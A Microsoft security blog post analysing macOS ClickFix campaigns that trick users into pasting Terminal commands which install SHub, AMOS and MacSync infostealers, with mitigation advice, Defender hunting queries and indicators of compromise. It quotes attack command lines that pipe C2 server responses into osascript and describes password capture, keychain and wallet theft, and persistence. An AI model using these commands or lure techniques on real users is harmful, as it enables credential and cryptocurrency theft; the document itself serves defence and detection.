ClickFix campaign uses fake macOS utilities lures to deliver infostealers

Microsoft researchers continue to observe the evolution of an infostealer campaign distributing ClickFix‑style instructions and targeting macOS users. In this recent iteration, threat actors attempt to take advantage of users who are looking for helpful advice on macOS-related issues (for example, optimizing their disk space) in blog sites and other user-driven content platforms by hosting their malicious commands in these sites.

These commands, which are purported to install system utilities, load an infostealing malware like Macsync, Shub Stealer, and AMOS into the targets’ devices instead. The malware then collects and exfiltrates data, including media files, iCloud data and Keychain entries, and cryptocurrency wallets. In some campaigns, the malware replaces legitimate cryptocurrency wallet apps with trojanized versions, putting users at an added security risk.  

Prior iterations of this campaign delivered the infostealers through disk image (.dmg) files that required users to manually install an application. This recent activity reflects a shift in tradecraft, where threat actors instruct users to run Terminal commands that leverage native utilities to retrieve remotely hosted content, followed by script‑based loader execution.

Unlike application bundles opened through Finder—which might be subjected to Gatekeeper verification checks such as code signing and notarization—scripts downloaded and launched directly through Terminal (for example, by using osascript or shell interpreters) don’t undergo the same evaluation. This delivery mechanism enables attackers to initiate malware execution through user‑driven command invocation, reducing reliance on traditional application delivery methods and increasing the likelihood of successful execution.

In this blog, we take a look at three campaigns that use this new tradecraft. We also provide mitigation guidance and detection details to help surface this threat.

Activity overview

Initial access

Standalone websites were seen hosting pages that included a Base64-encrypted instruction for end users to run. Some sites present this information in multiple languages. As of this writing, these websites that we’ve observed are either already down or have been reported.

Figure 1: Landing page of a script campaign (domenpozh[.]net)
Figure 2. ClickFix instructions hosted on mac-storage-guide.squarespace[.]com.
Figure 3. mac-storage-guide.squarespace[.]com page was seen presenting content in different languages, such as Japanese.

In other instances, content that included instructions leading to malware were observed to be hosted on Craft, a note-taking platform that lets writers and content creators take notes and distribute their content. We’ve observed that pages like macclean[.]craft[.]me were taken down relatively quickly.

Figure 4. ClickFix instruction hosted on macclean[.]craft[.]me.

Threat actors were also publishing fake troubleshooting posts on the popular blogging site Medium to distribute ClickFix instructions. These posts claim to solve common macOS problems. Blog sites such as macos-disk-space[.]medium[.]com instruct users to “fix” an issue by pasting a command into Terminal. The command then decodes and runs an AppleScript or Bash loader. These blogs were reported and taken down quickly.

We observed three distinct execution paths leveraging different infrastructure. We’re classifying these as a loader install campaign, a script install campaign, and a helper install campaign. In the loader and helper campaigns, we observed that a random seven-digit value (hereinafter referred to as random IDs), was used in data staging, marking the staging folders as /tmp/shub_<random ID> or/tmp/<random ID>.

The underlying goal remains the same in these campaigns: sensitive data collection, persistence, and exfiltration.

The following table summarizes the key differences between the campaigns. We discuss the details of each of these campaigns in the succeeding sections of this blog.

Activity or technique Loader campaign   Script campaign Helper campaign
Initial installation No file written on disk   No file written on disk /tmp/helper /tmp/update
Condition to exit execution Russian keyboard detected   Failure to resolve an active command-and-control (C2) endpoint (all infrastructure checks fail) Sandbox detected
Data staging /tmp/shub_<random ID>/tmp/out.zip None /tmp/<random ID>/tmp/out.zip
Persistence (Plist file created) ~/LaunchAgents/com.google.keystone.agent.plist   ~/LaunchAgents/com.<random value>.plist Library/LaunchDaemons/com.finder.helper.plist
Bot execution Payload: /GoogleUpdateC2 pattern: <C2 domain >/api/bot/heartbeat Resolves active C2 through hardcoded infrastructure and Telegram fallback   C2 domain: https://t[.]me/ax03bot Payload: /.agentC2 domain: hxxp://45.94.47[.]204/api/
Exfiltration <C2 domain>/api/debug/event<C2 domain>/gate/chunk <C2 domain>/upload.php <C2 domain>/contact
Trojanized cryptocurrency apps Trezor Suite.appLedger Wallet.appExodus.app   Not applicable (handled in later loader/payload stages) Trezor Suite.appLedger Wallet.app

Loader install campaign

Since February 2026, Microsoft researchers have observed a campaign that requests a loader shell from the attacker’s infrastructure using curl once a user copies and runs ClickFix commands using Terminal. It leads to further execution of a second-stage shell script. 

This second shell script is a zsh loader that decodes and decompresses an embedded payload using Base64 and Gzip, respectively. It then executes the payload using eval.

Figure 5: Shell loader.

The next-stage script also functions as a macOS reconnaissance and execution ‑control loader that first fingerprints the system by collecting the following information:

  • Keyboard locale
  • Hostname
  • Operating system version
  • External IP address

It then builds and sends a JSON object to an attacker‑controlled server containing an event name (loader_requested or cis_blocked) along with this telemetry. It also uses the presence of Russian/CIS keyboard layouts as a deliberate kill switch, reporting a cis_blocked event and stop the execution.

Figure 6: Reconnaissance loader with CIS kill switch.

If the system isn’t blocked, the script silently beacons a “loader requested” event and then downloads and executes a remote AppleScript payload directly in memory using osascript.

Figure 7: Reconnaissance loader with AppleScript payload delivery.

AppleScript infostealer

This multi-stage macOS AppleScript stealer employs user interaction-based credential capture, conducts broad data collection across browsers, Keychains, messaging applications, wallet artifacts, and user documents, and stages the collected data into a compressed archive for exfiltration to a remote endpoint. The malware further tampers with locally installed applications to intercept sensitive data, establishes persistence through a masqueraded LaunchAgent that mimics legitimate software updates, and maintains remote command execution capabilities by periodically polling a server for instructions, which are executed at runtime.

Data collection:  tmp/shub_<random ID> staging

We observed that the stealer self-identifies as “SHub Stealer” (it writes the marker SHub into its staging directory). It prompts the target user to enter their password, pretending to install a “helper” utility. It then validates the entered password using the command dscl . -authonly <username>. Upon successful validation, it sends a password_obtained event to its C2 infrastructure.

The malware stages collected data under a /tmp/shub_<random ID>/ folder. The collected data includes:

  • Browser credentials
  • Notes
  • Media files
  • Telegram data
  • Cryptocurrency wallets
  • Keychain entries
  • iCloud account data

The stealer also collects documents smaller than 2 MB and stages them within a FileGrabber repository located at /tmp/shub_<random ID>/FileGrabber/.

The targeted file types are:

  • txt
  • pdf
  • docx
  • wallet
  • key
  • keys
  • doc
  • jpeg
  • png
  • kdbx
  • rtf
  • jpg
  • seed

Once the data collection is complete, data is compressed and exfiltrated. The stealer deletes staging artifacts to reduce forensic evidence.

Wallet exfiltration and trojanization

Subsequently, the stealer probes the system for the presence of any of the following cryptocurrency wallet applications:

  • Electrum
  • Coinomi
  • Exodus
  • Atomic
  • Wasabi
  • Ledger Live
  • Monero
  • Bitcoin
  • Litecoin
  • DashCore
  • lectrum_LTC
  • Electron_Cash
  • Guarda
  • Dogecoin
  • Trezor_Suite
  • Sparrow

When it finds any of these applications, it stages their data for exfiltration.

The stealer was also observed replacing legitimate cryptocurrency wallets apps with attacker-controlled or trojanized ones:

  • Ledger Wallet.app is replaced by app.zip fetched from <C2 domain>/zxc/app.zip
  • Trezor suite.app is replaced by apptwo.zip fetched from <C2 domain>/zxc/apptwo.zip
  • Exodus.app is replaced by appex.zip fetched from <C2 domain>/zxc/appex.zip

These trojanized cryptocurrency wallet applications pose a serious risk to their users who might be unaware of the stealthy compromise and continue to use and transact with them.

Figure 8. Trojanized apps installation.

Persistence

For persistence, the malware creates an additional script within the newly created ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/ folder.

A malicious implant named GoogleUpdate is configured to RunAtLoad disguised as an agent. Microsoft Defender Antivirus detects this implant as Trojan:MacOS/SuspMalScript.

A new property list (plist), /Library/LaunchAgents/com.google.keystone.agent.plist,is then staged to run this agent.

Figure 9. Plist staging.

The executable is then given permission to run with the following command:

Figure 10. GoogleUpdate granted permission to run.

Once com.google.keystone.agent.plist loads, it functions as a backdoor-style bot component that registers the infected macOS system with attacker infrastructure at <C2 domain>/api/bot/heartbeat, uniquely identifies the host using a hardware-derived ID, and periodically beacons system metadata such as hostname, operating system version, and external IP address.

The C2 server can return Base64-encoded instructions, which the script decodes and executes locally and deletes traces, enabling remote command execution on demand. This process creates a persistent remote-control channel, where the attacker could push arbitrary shell code to the infected device at any time.

Figure 11. Backdoor style bot with heartbeat driven payload execution.

Script install campaign

In April 2026, Microsoft researchers observed an ongoing campaign that runs a heavily obfuscated infostealer when users run it through Terminal.

The attack begins with a social‑engineering instruction containing a Base64‑encoded command.

When decoded, this instruction resolves a one‑line shell pipeline that retrieves a remote script, which is then handed off immediately for execution. By encoding the command and streaming its output directly into the shell, the attacker avoids placing a recognizable payload on disk during the initial stage.

Figure 12. Payload delivery.

The retrieved script.sh payload is launched directly from the network stream, with no intermediate file written to disk. It’s responsible for establishing persistence and deploying follow-on functionality. It delivers the second-stage Base64 encoded script under a plist staged at ~/Library/LaunchAgent/com.<random name>.plist.

Figure 13. Payload staged into a plist.

The persisted AppleScript is heavily obfuscated in its original form (character ID concatenation). After decoding, the key logic follows:

Figure 14. AppleScript stager (decoded).

This AppleScript functions as a C2 discovery and execution orchestrator for a macOS malware campaign. The AppleScript is used as the control layer and standard Unix tools for network interaction and execution. Its first role is C2 discovery. It iterates over a list of potential server identifiers (for example {0x666[.]info}), constructs candidate URLs (http://<value>/), and probes them using curl with a realistic Chrome macOS user agent and a benign POST body (-d “check”). This connectivity test is performed through the following command:

/usr/bin/curl -s -H “<User-Agent>” -d “check” –connect-timeout 5 –max-time 10 <candidate_url>

Figure 15. Initial C2 communication.

If none of the hard‑coded infrastructure responds successfully, the script falls back to Telegram‑based C2 discovery. It fetches a Telegram bot page using curl -s hxxps://t[.]me/ax03bot and extracts a hidden server identifier embedded in an HTML <span dir=”auto”> element using sed. This lets the attacker rotate C2 infrastructure dynamically.

Figure 16. Telegram-based C2 endpoint discovery.

Once a working C2 endpoint is identified, the script moves into execution orchestration. It sends a final POST request to the resolved server containing a transaction ID (txid) and module identifier, then immediately pipes the server response into osascript for execution:

curl -s -X POST <C2_URL> -H “<User-Agent>” -d “<txid>&module” | osascript

This command enables arbitrary AppleScript execution directly from the server, fully in memory, with no payload written to disk. Output and errors are suppressed, and execution only proceeds if all connectivity checks succeed. Overall, this isn’t a simple downloader but a resilient, infrastructure‑aware loader designed to dynamically discover C2 endpoints, evade takedowns, and execute attacker‑controlled AppleScript logic on demand.

We observed data exfiltration to the attacker’s infrastructure on a C2/upload.php endpoint leveraging curl.

Figure 17. Exfiltration of archived data.

Helper install campaign (AMOS)

Starting at the end of January 2026 , another ClickFix campaign relied on an executable file named helper or update to run. In this campaign, once a user ran the encoded ClickFix instructions, a first-stage script decoded a Base64 payload and then decompressed the payload using Gunzip.

Figure 18. First-stage script requested.

The first-stage script led to the retrieval of the second stage-malicious Mach Object (Mach-O) executable into the newly created /tmp/<file name> folder.

Figure 19. /tmp/helper installation.

In February 2026, this campaign retrieved the payload under a /tmp/update folder.

Figure 20. /tmp/update installation.

This malicious executable file has its extended properties removed and is then given permission to run and launch on the victim’s device.

Virtualization detection

The infection chain begins with an AppleScript based stager that uses array subtraction obfuscation to conceal its strings and commands. This stager performs an anti-analysis gate by invoking system_profiler and inspecting both memory and hardware profiles. Specifically, it searches for common virtualization indicators such as QEMU, VMware, and KVM. In addition to explicit hypervisor vendor strings, the script also checks for a set of generic hardware artifacts commonly observed in virtualized or analysis environments, including:

  • Chip: Unknown
  • Intel Core 2
  • Virtual Machine
  • VirtualMac

If any of these indicators are present, execution is terminated early, preventing further stages from running.

Data collection and exfiltration

Like the loader install campaign, the stealer prompts the user to enter their password. It validates locally whether the entered password is correct using dscl utility.

After capturing the target user’s password, the malware then focuses on stealing high-value credentials and financial artifacts. It copies macOS Keychain databases, enabling access to stored website passwords, application secrets, and WiFi credentials.

It also collects browser authentication material from Chromium‑based browsers, including saved usernames and passwords, session cookies, autofill data, and browser profile state that can be reused for account takeover. In addition, the script targets cryptocurrency wallets, copying data associated with both browser‑based and desktop wallets. This includes browser extensions such as MetaMask and Phantom, as well as desktop wallets including Exodus and Electrum.

 The stealer compresses collected data into a ZIP file /tmp.out.zip, which is then exfiltrated to a <C2 domain>/contact> endpoint. The stealer removes staging artifacts to reduce forensic evidence.

Figure 21. Archiving and exfiltration of data.

Wallet exfiltration and trojanization

Similar to the loader campaign, the stealer in the helper also replaces legitimate wallet apps with attackers-controlled ones:

  • Ledger Wallet.app is replaced by app.zip fetched from <C2 domain>/zxc.app.zip.
  • Trezor suite.app is replaced by apptwo.zip fetched from <C2 domain>/zxc/apptwo.zip

Backdoor deployment and persistence

To maintain long‑term access to infected systems, the helper campaign deploys a multi‑stage persistence mechanism built around two cooperating components: a primary backdoor binary and a lightweight execution wrapper.

Download and execution of the backdoor component (.mainhelper)

The persistence chain begins with the download of a second‑stage backdoor implant named .mainhelper into the current user’s home directory. As shown in Figure 22, the obfuscated AppleScript issues a network retrieval command that fetches this Mach‑O executable from an attacker-controlled endpoint (<C2 domain>/zxc/kito) and writes it as a hidden file under the user profile.

Figure 22. Second implant downloaded.

Once it’s given attributes and permissions to run, the /.mainhelper implant joins the compromised device to a C2 endpoint hxxp://45.94.47[.]204/api/. The implant executes tasks from the attacker, providing a remote-control capability to the attacker on the compromised system.

Figure 23. C2 instance.

Creation of the execution wrapper (.agent)

In addition to the backdoor binary, the stealer creates a secondary file named .agent, also placed in the user’s home directory. Unlike .mainhelper, .agent isn’t a full implant. Instead, it is a lightweight shell wrapper whose sole purpose is to launch and supervise the .mainhelper process. The script writes the wrapper to disk and configures it so that, if the backdoor process terminates or crashes, .agent relaunches it.

LaunchDaemon installation (com.finder.helper.plist)

After prompting the victim for their macOS password and validating it, the script escalates privileges to establish system-level persistence. It constructs a LaunchDaemon plist, stages the XML content to a temporary file (/tmp/starter), and then writes it to /Library/LaunchDaemons/com.finder.helper.plist.

LaunchDaemon plist staging and loading

LaunchDaemon is configured to run /bin/bash with the path to ~/.agent as its argument, rather than invoking the backdoor binary directly. As shown in Figure 25, the script sets correct ownership, loads the daemon using launchctl, and enables both RunAtLoad and KeepAlive.

Figure 24. Plist staging.

As a result, on every system boot, launchd runs the .agent wrapper with root privileges, which in turn ensures that the .mainhelper backdoor process is running.

Figure 25. Plist loading.

Mitigation and protection guidance

Apple Xprotect has updated signatures to protect users against this threat. Additionally, in macOS 26.4 and later, Apple has introduced a mitigation that directly addresses the ClickFix delivery mechanism.


When a user attempts to paste a potentially malicious command into Terminal, they will now see the following prompt:

Possible malware, Paste blocked

Your Mac has not been harmed. Scammers often encourage pasting text into Terminal to try and harm your Mac or compromise your privacy. These instructions are commonly offered via websites, chat agents, apps, files, or a phone call.


Organizations can also follow these recommendations to mitigate threats associated with this threat:

  • Educate users. Warn them against running instructions from untrusted sources.
  • Monitor Terminal usage. Alert on suspicious Terminal or shell sessions spawned by installers or user apps.
  • Detect native tool abuse. Flag unusual sequences of macOS utilities (curl, Base64, Gunzip, osascript, and dscl).
  • Inspect outbound downloads. Monitor curl activity fetching encoded or compressed payloads from unknown domains.
  • Protect credential stores. Detect unauthorized access to keychain items, browser data, SSH keys, and cloud credentials.
  • Monitor data staging. Alert on archive creation of sensitive artifacts followed by HTTP POST exfiltration.
  • Enable endpoint protection. Ensure macOS endpoint detection and response (EDR) or extended detection and response (XDR) monitors script execution and living‑off‑the‑land behavior.
  • Restrict C2 traffic. Block outbound connections to suspicious or newly registered domains.

Microsoft also recommends the following mitigations to reduce the impact of this threat.

  • Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
  • Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
  • Allow investigation and remediation in full automated mode to allow Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
  • Turn on tamper protection features to prevent attackers from stopping security services. Combine tamper protection with the DisableLocalAdminMerge setting to mitigate attackers from using local administrator privileges to set antivirus exclusions.

Microsoft Defender detections

Microsoft Defender customers can refer to the list of applicable detections below. Microsoft Defender coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

Tactic Observed activity Microsoft Defender coverage
Execution User copies, pastes, and runs Base64 instructions Base64 instructions are deobfuscated Executable files are created from remote attacker’s infrastructureInstalled malware implant is executed Malicious AppleScript is retrieved from attacker infrastructureSequence of malicious instructions are executed Microsoft Defender for Endpoint
Suspicious shell command execution
Obfuscation or deobfuscation activity
Executable permission added to file or directory
Suspicious launchctl tool activity
‘SuspMalScript’ malware was prevented
Possible AMOS stealer Activity Suspicious AppleScript activity
Suspicious piped command launched
Suspicious file or information obfuscation detected

Microsoft Defender Antivirus Trojan:MacOS/Multiverze – Created executable file
Trojan:MacOS/SuspMalScript – Malware implant downloaded by the loader campaign
Behavior:MacOS/SuspAmosExecution – Malicious file execution
Behavior:MacOS/SuspOsascriptExec – Malicious osascript execution
Behavior:MacOS/SuspDownloadFileExec – Suspicious file download and execution
Behavior:MacOS/SuspiciousActiviyGen  

Data collection Malware collects data from bash history, browser credentials, and other sensitive foldersMultiple files are collected into staging foldersCollected data is staged and archived into a folder Staging folders are removed Microsoft Defender for Endpoint
Suspicious access of sensitive filesSuspicious process collected data from local systemEnumeration of files with sensitive dataSuspicious archive creationSuspicious path deletion  

Microsoft Defender Antivirus Behavior:MacOS/SuspPassSteal – Suspicious process collected data from local systemTrojan:MacOS/SuspDecodeExec – Malicious plist detection

Defense evasion Malware deletes the staging paths following exfiltrationExecution of obfuscated code to evade inspection   Microsoft Defender for Endpoint   Suspicious path deletionSuspicious file or information obfuscation detected  
Credential access Malware steals user account credential and stages files for exfiltration Microsoft Defender for Endpoint Suspicious access of sensitive filesUnix credentials were illegitimately accessed  
Exfiltration Malware exfiltrates staged data using curl and HTTP POST Microsoft Defender for Endpoint Possible data exfiltration using curl  

Microsoft Defender Antivirus Behavior:MacOS/SuspInfoExfilTrojan:MacOS/SuspMacSyncExfil

Threat intelligence reports

Microsoft Defender customers can use the following threat analytics reports in the Defender portal (requires license for at least one Defender product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to help prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender threat analytics

From ClickFix to code signed: the quiet shift of MacSync Stealer malware.

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.

Hunting queries

Microsoft Defender

Microsoft Defender customers can run the following queries to find related activity in their networks:

Initial access

//Loader campaign installation
DeviceNetworkEvents
| where InitiatingProcessCommandLine has_any ("loader.sh?build=","payload.applescript?build=")

// Helper campaign installation
DeviceFileEvents
| where InitiatingProcessCommandLine  has_all("curl", "/tmp/helper","-o")

//Install of /update install campaign
DeviceFileEvents
| where InitiatingProcessCommandLine  has_all("curl", "/tmp/update","-o")
| where FileName== "update"

Exfiltration to C2 infrastructure

//loader campaign

DeviceProcessEvents
| where ProcessCommandLine has_all("curl", "post","/debug/event", "build_hash")

DeviceProcessEvents
| where ProcessCommandLine  has_all("curl","/tmp","post","-H","-f","build","/gate")
| where not (ProcessCommandLine has_any(".claude/shell-snapshots")) 

//script campaign 

DeviceNetworkEvents
| where InitiatingProcessCommandLine has_all ("curl","-F","txid","zip","max-time")

//helper campaign
DeviceProcessEvents
| where InitiatingProcessCommandLine has_all ("curl","post","-H","user","buildid","cl","cn","/tmp/")

Bot C2 installation and communication

//loader campaign - bot install
DeviceFileEvents
| where InitiatingProcessCommandLine =="base64 -d"
| where FolderPath endswith @"Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate"

//loader campaign – bot communication
DeviceProcessEvents
 | where ProcessCommandLine  has_all("/api/bot/heartbeat","post","curl")

//script campaign second stage execution 
DeviceProcessEvents
 | where ProcessCommandLine  has_all("curl","POST","txid","osascript","bmodule","max-time")

//helper campaign - bot install 

//Alternate query for helper or bot update installation
DeviceFileEvents
| where  InitiatingProcessCommandLine has_all ("curl","zxc","kito")

DeviceProcessEvents
| where InitiatingProcessFileName =="osascript"
| where  ProcessCommandLine  has_all ("sh","echo","-c", "cp","/tmp/starter",".plist")

Indicators of compromise

Domains distributing ClickFix

Indicator Type Description
cleanmymacos[.]org Domain Distribution of ClickFix  instructions
mac-storage-guide.squarespace[.]com Domain Distribution of ClickFix instructions 
claudecodedoc[.]squarespace[.]com Domain Distribution of ClickFix instructions 
domenpozh[.]net Domain Distribution of ClickFix instructions   
macos-disk-space[.]medium[.]com Domain Distribution of ClickFix instructions   
macclean[.]craft[.]me Domain  Distribution of ClickFix instructions
apple-mac-fix-hidden[.]medium[.]com Domain Distribution of ClickFix instructions 

Loader campaign

Indicator Type Description
rapidfilevault4[.]sbs Domain Payload delivery and C2
coco-fun2[.]com Domain Payload delivery and C2
nitlebuf[.]com Domain Payload delivery and C2
yablochnisok[.]com Domain Payload delivery and C2
mentaorb[.]com Domain Payload delivery and C2
seagalnssteavens[.]com Domain Payload delivery and C2
res2erch-sl0ut[.]com Domain Payload delivery and C2
filefastdata[.]com Domain Payload delivery and C2
metramon[.]com Domain Payload delivery and C2
octopixeldate[.]com Domain Payload delivery and C2
pewweepor092[.]com Domain Payload delivery and C2
bulletproofdomai2n[.]com Domain Payload delivery and C2
benefasts-fhgs2[.]com Domain Payload delivery and C2
repqoow77wiqi[.]com Domain Payload delivery and C2
do2wers[.]com Domain Payload delivery and C2
rapidfilevault4[.]cyou Domain Payload delivery and C2
reews09weersus[.]com Domain Payload delivery and C2
pepepupuchek13[.]com Domain Payload delivery and C2
pewqpeee888[.]com Domain Payload delivery and C2
wewannaliveinpicede[.]com Domain Payload delivery and C2
datasphere[.]us[.]com Domain Payload delivery and C2
rapidfilevault5[.]sbs Domain Payload delivery and C2
coco2-hram[.]com Domain Payload delivery and C2
poeooeowwo777[.]com Domain Payload delivery and C2
korovkamu[.]com Domain Payload delivery and C2
metrikcs[.]com Domain Payload delivery and C2
metlafounder[.]com Domain Payload delivery and C2
terafolt[.]com Domain Payload delivery and C2
haploadpin[.]com Domain Payload delivery and C2
rawmrk[.]com Domain Payload delivery and C2
mikulatur[.]com Domain Payload delivery and C2
milbiorb[.]com Domain Payload delivery and C2
doqeers[.]com Domain Payload delivery and C2
we2luck[.]com Domain Payload delivery and C2
quantumdataserver5[.]homes Domain Payload delivery and C2
bintail[.]com Domain Payload delivery and C2
molokotarelka[.]com Domain Payload delivery and C2
trehlub[.]com Domain Payload delivery and C2
avafex[.]com Domain Payload delivery and C2
rhymbil[.]com Domain Payload delivery and C2
boso6ka[.]com Domain Payload delivery and C2
res2erch-sl2ut[.]com Domain Payload delivery and C2
pilautfile[.]com Domain Payload delivery and C2
bigbossbro777[.]com Domain Payload delivery and C2
miappl[.]com Domain Payload delivery and C2
peloetwq71[.]com Domain Payload delivery and C2
fastfilenext[.]com Domain Payload delivery and C2
beransraol[.]com Domain Payload delivery and C2
pelorso90la[.]com Domain Payload delivery and C2
medoviypirog[.]com Domain Payload delivery and C2
wewannaliveinpice[.]com Domain Payload delivery and C2
malkim[.]com Domain Payload delivery and C2
pipipoopochek6[.]com Domain Payload delivery and C2
hello-brothers777[.]com Domain Payload delivery and C2
dialerformac[.]com Domain Payload delivery and C2
persaniusdimonica8[.]com Domain Payload delivery and C2
hilofet[.]com Domain Payload delivery and C2
tmcnex[.]com Domain Payload delivery and C2
nibelined[.]com Domain Payload delivery and C2
pissispissman[.]com Domain Payload delivery and C2
bankafolder[.]com Domain Payload delivery and C2
perewoisbb0[.]com Domain Payload delivery and C2
us41web[.]live Domain Payload delivery and C2
uk176video[.]live Domain Payload delivery and C2
jihiz[.]com Domain Payload delivery and C2
beltoxer[.]com Domain Payload delivery and C2
swift-sh[.]com Domain Payload delivery and C2
hitkrul[.]com Domain Payload delivery and C2
kofeynayagush[.]com Domain Payload delivery and C2  

Script campaign

Indicator Type Description
hxxps://cauterizespray[.]icu/script[.]sh URL Payload delivery
hxxps://enslaveculprit[.]digital/script[.]sh URL Payload delivery
hxxps://resilientlimb[.]icu/script[.]sh URL Payload delivery
hxxps://thickentributary[.]digital/script[.]sh   URL Payload delivery
hxxp://paralegalmustang[.]icu/script[.]sh URL   Payload delivery  
hxxps://round5on[.]digital/script[.]sh   URL Payload delivery  
hxxps://qjywvkbl[.]degassing-mould[.]digital URL Payload delivery  
hxxps://zg5mkr7q[.]apexharvestor[.]digital URL Payload delivery  
hxxps://kvrnjr30[.]apexharvestor[.]digital URL Payload delivery  
hxxps://yygp4pdh[.]apexharvestor[.]digital   URL Payload delivery  
hxxps://t[.]me/ax03bot URL Payload delivery  
0x666[.]info Domain Payload delivery, C2, and exfiltration
honestly[.]ink Domain   Payload delivery, C2, and exfiltration
95.85.251[.]177

 

IP address Payload delivery, C2, and exfiltration
pla7ina[.]cfd Domain Payload delivery, C2, and exfiltration
play67[.]cc Domain Payload delivery, C2, and exfiltration

Helper campaign

Indicator  Type  Description 
rvdownloads[.]com   Domain  Payload delivery 
famiode[.]com   Domain  Payload delivery 
contatoplus[.]com   Domain  Payload delivery 
woupp[.]com   Domain  Payload delivery 
saramoftah[.]com   Domain  Payload delivery 
ptrei[.]com   Domain  Payload delivery 
wriconsult[.]com   Domain  Payload delivery 
kayeart[.]com   Domain  Payload delivery 
ejecen[.]com   Domain      Payload delivery 
stinarosen[.]com   Domain  Payload delivery 
biopranica[.]com   Domain    Payload delivery 
raxelpak[.]com   Domain    Payload delivery 
octopox[.]com   Domain    Payload delivery 
boosterjuices[.]com  Domain    Payload delivery 
ftduk[.]com Domain Payload delivery 
dryvecar[.]com Domain Payload delivery 
vcopp[.]com Domain Payload delivery 
kcbps[.]com Domain Payload delivery 
jpbassin[.]com Domain Payload delivery 
isgilan[.]com Domain   Payload delivery
arkypc[.]com Domain   Payload delivery
hacelu[.]com Domain Payload delivery 
stclegion[.]com Domain Payload delivery
xeebii[.]com   Domain Payload delivery
hxxp://138.124.93[.]32/contact   URL  Exfiltration endpoint 
hxxp://168.100.9[.]122/contact   URL  Exfiltration endpoint
hxxp://199.217.98[.]33/contact   URL  Exfiltration endpoint
hxxp://38.244.158[.]103/contact   URL  Exfiltration endpoint
hxxp://38.244.158[.]56/contact   URL  Exfiltration endpoint
hxxp://92.246.136[.]14/contact   URL  Exfiltration endpoint
hxxps://avipstudios[.]com/contact   URL  Exfiltration endpoint
hxxps://joytion[.]com/contact   URL  Exfiltration endpoint
hxxps://laislivon[.]com/contact   URL  Exfiltration endpoint
hxxps://mpasvw[.]com/contact URL Exfiltration endpoint
hxxps[://]lakhov[.]com/contact URL Exfiltration endpoint

Update campaign infrastructure

Indicator Type Description
reachnv[.]com Domain Delivery of the update install variant of the helper campaign
vagturk[.]com Domain   Delivery of the update install variant of the helper campaign  
futampako[.]com Domain   Delivery of the update install variant of the helper campaign  
octopox[.]com Domain   Delivery of the update install variant of the helper campaign  
lbarticle[.]com Domain   Delivery of the update install variant of the helper campaign  
raytherrien[.]com Domain   Delivery of the update install variant of the helper campaign  
joeyapple[.]com Domain   Delivery of the update install variant of the helper campaign  

Persistence and bot execution

Indicator Type Description
45.94.47[.]204 IP address Bot communication IP address
wusetail[.]com Domain Hosting bot payload 
aforvm[.]com Domain  Hosting bot payload
ouilov[.]com  Domain Hosting bot payload 
malext[.]com Domain Hosting bot payload
rebidy[.]com Domain Hosting bot payload

Payloads

Indicator Type Description
 9d2da07aa6e7db3fbc36b36f0cfd74f78d5815f5ba55d0f0405cdd668bd13767   SHA-256 Payload 
 7ca42f1f23dbdc9427c9f135815bb74708a7494ea78df1fbc0fc348ba2a161ae SHA-256 Payload
241a50befcf5c1aa6dab79664e2ba9cb373cc351cb9de9c3699fd2ecb2afab05   SHA-256 Payload
522fdfaff44797b9180f36c654f77baf5cdeaab861bbf372ccfc1a5bd920d62e SHA-256 Payload

File indicators of attack

Indicator Type Description
/tmp/helper Folder path Malware staging  
/tmp/starter Folder path Malware plist staging
~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate Folder path Malicious file masquerading as Google Update component
~/LaunchAgents/com.google.keystone.agent.plist Plist name  Staged plist running malicious executable
~/Library/LaunchAgents/com.<random value>.plist Plist name Staged plist running malicious executable 

References

This research is provided by Microsoft Defender Security Research with contributions from Arlette Umuhire Sangwa, Kajhon Soyini, Srinivasan Govindarajan, Michael Melone, and  members of Microsoft Threat Intelligence.

Learn more

The post ClickFix campaign uses fake macOS utilities lures to deliver infostealers appeared first on Microsoft Security Blog.

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